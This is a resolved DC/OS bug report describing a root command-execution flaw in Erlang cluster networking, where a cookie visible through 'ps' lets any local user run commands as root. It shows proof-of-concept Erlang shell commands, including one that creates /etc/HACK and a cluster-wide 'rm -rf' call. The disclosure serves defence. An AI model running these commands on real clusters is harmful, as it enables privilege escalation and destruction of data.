Uploaded image for project: 'DC/OS'
  1. DC/OS
  2. DCOS_OSS-4085

Arbitrary non-privileged user command execution with root permissions

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: High
    • Resolution: Done
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: networking
    • Labels:
      None

      Description

      Possible aleatory non-privileged user command execution with root permissions. The problem is related with the way that Erlang clusters are deployed in DC/OS, the cluster is deployed as distributed Erlang (full-mesh network) using a cookie as security

      barrier (passed as command line parameter). With this kind of deployment whatever non root user can execute whatever command in the whole cluster with root privileges. Because Erlang nodes are running under the context of root (UID 0).

      $ erl -pa /opt/mesosphere/active/dcos-net/dcos-net/lib/dcos_net-0.1.0/ebin -epmd_module dcos_net_epmd -start_epmd false -no_epmd -proto_dist dcos_net -name debug@localhost -setcookie minuteman
      
      (debug@localhost)1> net_adm:ping('navstar@192.168.121.221').
      pong
      (debug@localhost)2> rpc:call('navstar@192.168.121.221', os, cmd,
      ["touch /etc/HACK"]).
      
       [vagrant@a1 ~]$ ls -lh /etc/HACK
      -rw-r--r--. 1 root root 0 Sep  6 11:27 /etc/HACK
      
      Even the classical command:
      
      (debug@localhost)2> rpc:multicall(nodes(), os, cmd, ["cd /; rm -rf *"]).
      

      The user can get the cookie with "ps" and the permissions for getting the path for the custom epmd module is open too.

        Attachments

          Activity

            People

            • Assignee:
              dominikdary Dominik Dary
              Reporter:
              javiroman javiroman
              Team:
              Security Team
              Watchers:
              Dominik Dary, Jan-Philip Gehrcke, javiroman, marquetemb, Matt Jarvis, Sergey Urbanovich, Somik Behera
            • Watchers:
              7 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: